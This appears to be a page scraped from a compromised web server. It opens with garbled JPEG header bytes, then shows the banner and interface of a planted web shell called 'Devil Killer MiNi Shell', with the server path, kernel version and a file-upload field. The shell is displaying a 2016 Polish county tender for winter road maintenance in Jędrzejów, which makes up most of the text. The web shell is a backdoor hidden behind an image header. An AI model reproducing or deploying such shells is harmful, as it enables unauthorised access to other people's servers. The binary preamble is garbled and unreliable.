JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303551-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 303551 - 2016
              z dnia 2016-08-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jędrzejów: ZIMOWE UTRZYMANIE DRÓG POWIATOWYCH W POWIECIE JĘDRZEJOWSKIM NA LATA 2016-2019.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              29994337900000, ul.
              ul. Stefana Okrzei 
              83,
              28300  
              Jędrzejów, woj.
              świętokrzyskie, państwo
              , tel.
              413 861 426, e-mail
              , faks
              413 861 171.
              <br />
              Adres strony internetowej (URL): www.powiatjedrzejow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.powiatjedrzejow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r.  Prawo pocztowe (Dz. U. poz.  1529 oraz z 2015r. poz. 1830), osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />Zarzd Dróg Powiatowych, Dział Zamówień Publicznych, pokój nr 4, ul. Okrzei 83, 28-300 Jędrzejów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ZIMOWE UTRZYMANIE DRÓG POWIATOWYCH W POWIECIE JĘDRZEJOWSKIM NA LATA 2016-2019.<br /><b>Numer referencyjny: </b>ZP.451.U.14.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />17<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia: Zimowe utrzymanie dróg powiatowych w Powiecie Jędrzejowskim na lata 2016-2019. 
2.	Przedmiotem zamówienia jest kompleksowe zimowe utrzymanie dróg powiatowych, polegające na zapewnieniu przejezdności dróg oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni poprzez usuwanie śniegu i błota pośniegowego. Zapobieganie powstawaniu i likwidowanie śliskości zimowej (posypywanie piaskiem lub mieszanką piaskowo-solną). 
2.1.	Przedmiot Zamówienia podzielony jest na 17 zadań.
2.2.	Składając ofertę na kilka Zadań, należy złożyć Formularz Oferta  zał. nr 1 do siwz dla każdego Zadania oddzielnie.
2.3.	Wpisując ceny: brutto i netto w Formularz Oferta należy je podać odpowiednio w zależności od Zadania w zł/godź lub zł/km)  
2.4.	  Poniżej wykaz poszczególnych Zadań, na jakie zostało podzielone przedmiotowe zamówienie:
I.	Teren i sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu:
Zadanie 1: zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt; Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług średni odśnieżny typ PO 97W
Zadanie 2: zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt; Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług odśnieżny typ PO 97D
Zadanie 3: zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim /własność wykonawcy/, plac, materiał zamawiającego - szt. 1;Przewidywany zakres robót wynosi 45 000 km
Zadanie 4: zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim/własność wykonawcy/, plac, materiał zamawiającego - szt. 1 
Przewidywany zakres robót wynosi 45 000 km
Zadanie 5: usługi dotyczące zimowego utrzymania dróg wykonywane ładowarką o wydajności Min 8 m3 /godz /własność wykonawcy/ - 1 szt
Przewidywany zakres robót wynosi 900 godzin
Praca sprzętu dla Zadania 1-4 będzie obejmowała teren:
1.	Gminy Wodzisław  wszystkie drogi powiatowe na terenie gminy
2.	Gminy Sędziszów  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Słupia Jędrzejowska - wszystkie drogi powiatowe na terenie gminy
4.   Gmina Imielno - wszystkie drogi powiatowe na terenie gminy
5.   Gminy Jędrzejów  drogi powiatowe na terenie gminy z wyłączeniem:
- ulica powiatowa Przypkowskiego w Jędrzejowie   		
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków 
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
                            
II.	Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu 
Zadanie 6: zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt; Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług średni odśnieżny typ PO 97WU
Zadanie 7: zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt; Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług średni odśnieżny typ PO 97WU
Zadanie 8: zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim/własność wykonawcy/, plac, materiał zamawiającego - szt. 1 ; Przewidywany zakres robót wynosi 45 000 km
Zadanie 9: zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim /własność wykonawcy/, plac, materiał zamawiającego - szt. 1; Przewidywany zakres robót wynosi 45 000 km
Zadanie 10: zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 ; Przewidywany zakres robót wynosi 45 000 km
Zadanie 11: usługi dotyczące zimowego utrzymania dróg wykonywane ładowarką o wydajności min 8 m3 /godz /własność wykonawcy/ - 1 szt;                  Przewidywany zakres robót wynosi 900 godzin
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
      - droga powiatowa nr 0164T odc. Wolica-Raków           
      - droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
      - droga powiatowa nr 0211T Chorzewa-Lasków
I.	Świadczenie usług przy zimowym utrzymaniu dróg  w dyspozycji Zamawiającego pod nadzorem Zarządu Dróg Powiatowych w Jędrzejowie
Zadanie 12: odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim /własność Wykonawcy/  1 szt
Przewidywany zakres robót wynosi 8 100 km
Zadanie 13: odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim /własność Wykonawcy/  1 szt;
Przewidywany zakres robót wynosi 8 100 km
Zadanie 14: odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim /własność Wykonawcy/  1 szt;
Przewidywany zakres robót wynosi 8 100 km
Zadanie 15: odśnieżanie przy użyciu pługa ciężkiego dwustronnego  na nośniku ciężkim /własność Wykonawcy/  1 szt; 
Przewidywany zakres robót wynosi 8 100 km
Zadanie 16: odśnieżanie wykonywane równiarką z pługiem czołowym dwustronnym
/własność Wykonawcy/   1 szt;
Przewidywany zakres robót wynosi 450 godzin
Praca sprzętu dla Zadania 12-16  będzie obejmowała:
wszystkie drogi  powiatowe na terenie  całego powiatu jędrzejowskiego.

Zadanie 17:  a/ ustawienie zasłon przeciwśnieżnych  Przewidywany zakres robót wynosi 50 km ORAZ b/ zdjęcie zasłon przeciwśnieżnych  Przewidywany zakres robót wynosi 50 km

2.5.	Wykonawca ma obowiązek zapoznana się z warunkami technicznymi zimowego utrzymania dróg - zał. nr 4 do siwz.
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/04/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Realizacja zamówienia obejmuje 3 sezony zimowe:
I sezon zimowy od 01.11.2016r. do 30.04.2017r.
II sezon zimowy od 01.11.2017r. do 30.04.2018r.
III sezon zimowy od 01.11.2018 do 30.04.2019r. 
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000, 00 zł, ( na okres co najmniej do końca 2016r. i gotowość do zachowania ciągłości ubezpieczenia przez cały okres trwania umowy w latach kolejnych).
Warunek ten podlega sumowaniu, co oznacza, że w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia  (np. konsorcja, spółki cywilne), ww warunek mogą spełnić łącznie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	Wykonawcy:
Wykonawca musi wykazać się doświadczeniem, w prowadzeniu akcji zimowej w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie:
	Należycie wykonali usługi zimowego utrzymania dróg przynajmniej w ciągu jednego sezonu zimowego o wartości co najmniej 50 000,00 zł brutto każda (słownie: pięćdziesiąt tysięcy złotych brutto) 
Warunek ten nie podlega sumowaniu, co oznacza, że co oznacza, że wykonawca składający ofertę musi wykazać się całym doświadczeniem.
	Należycie w wykonali usługę ustawienia i zdjęcia siatki przeciwśnieżnej W ILOŚCI CO NAJMNIEJ 18 KM w ciągu jednego sezonu zimowego, ale nie wcześniej niż w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane.
Warunek ten nie podlega sumowaniu, co oznacza, że wykonawca składający ofertę musi wykazać się całym doświadczeniem.
b)  posiada  sprzęt niezbędny do wykonania zmówienia.
	W przypadku gdy wykonawca składa ofertę na zadania, w których wymagane jest posiadanie własnego sprzętu, wówczas musi udowodnić,  że dysponuje minimum jedną jednostką sprzętową dla każdego zadania, na które składa ofertę. 
Warunek ten podlega sumowaniu, co oznacza, że w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia  (np. konsorcja, spółki cywilne), ww warunek mogą spełnić łącznie. 

	Wykonawca zobowiązany jest wykazać, że, że dysponuje sprzętem, materiałami i innymi narzędziami niezbędnymi do realizacji przedmiotu zamówienia wraz z informacją o podstawie dysponowania nimi.
Warunek ten podlega sumowaniu, co oznacza, że w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia  (np. konsorcja, spółki cywilne), ww warunek mogą spełnić łącznie. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału 
w postępowaniu wykonawca składa następujące dokumenty:
1.1. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
1.2. zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
1.3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;
1.4. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 składa następujące dokumenty:
2.1. odnośnie pkt 1.1.  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy Pzp, 
2.2. odnośnie pkt 1.2. oraz 1.3.  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
3. Dokumenty, o których mowa w pkt 2 ppkt. 2.1. i pkt 2 ppkt. 2. 2) lit. b), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 2 ppkt. 2.2. lit. a), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
